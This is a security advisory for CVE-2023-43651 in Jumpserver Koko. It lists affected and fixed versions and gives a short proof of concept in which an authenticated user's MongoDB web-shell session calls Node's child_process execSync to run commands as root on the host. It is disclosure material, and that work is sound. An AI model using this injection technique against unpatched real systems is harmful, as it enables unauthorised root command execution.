Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS00cjV4LXgyODMtd205Ns4AA2oW

Jumpserver Koko vulnerable to remote code execution on the host system via MongoDB shell

Impact

An authenticated user can exploit a vulnerability in MongoDB sessions to execute arbitrary commands, leading to remote code execution. This vulnerability may further be leveraged to gain root privileges on the host system.

Details

Through the WEB CLI interface provided by koko, a user logs into the authorized mongoDB database and exploits the MongoDB session to execute arbitrary commands.

admin> const { execSync } = require("child_process")
admin> console.log(execSync("id; hostname;").toString())
uid=0(root) gid=0(root) groups=0(root)
jms_koko
admin>

Patches

Safe versions:

Workarounds

It is recommended to upgrade the safe versions.

After upgrade, you can use the same method to check whether the vulnerability is fixed.

admin> console.log(execSync("id; hostname;").toString())
/bin/sh: line 1: /bin/hostname: Permission denied

References

Thanks for Oskar Zeino-Mahmalat of Sonar found and report this vulnerability

Permalink: https://github.com/advisories/GHSA-4r5x-x283-wm96
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cjV4LXgyODMtd205Ns4AA2oW
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 6 months ago
Updated: 6 months ago


CVSS Score: 6.4
CVSS vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H

Identifiers: GHSA-4r5x-x283-wm96, CVE-2023-43651
References: Repository: https://github.com/jumpserver/jumpserver
Blast Radius: 0.0

Affected Packages

go:github.com/jumpserver/koko
Dependent packages: 1
Dependent repositories: 1
Downloads:
Affected Version Ranges: >= 3.0.0, < 3.7.1, >= 2.0.0, < 2.28.20
Fixed in: 3.7.1, 2.28.20
All affected versions:
All unaffected versions: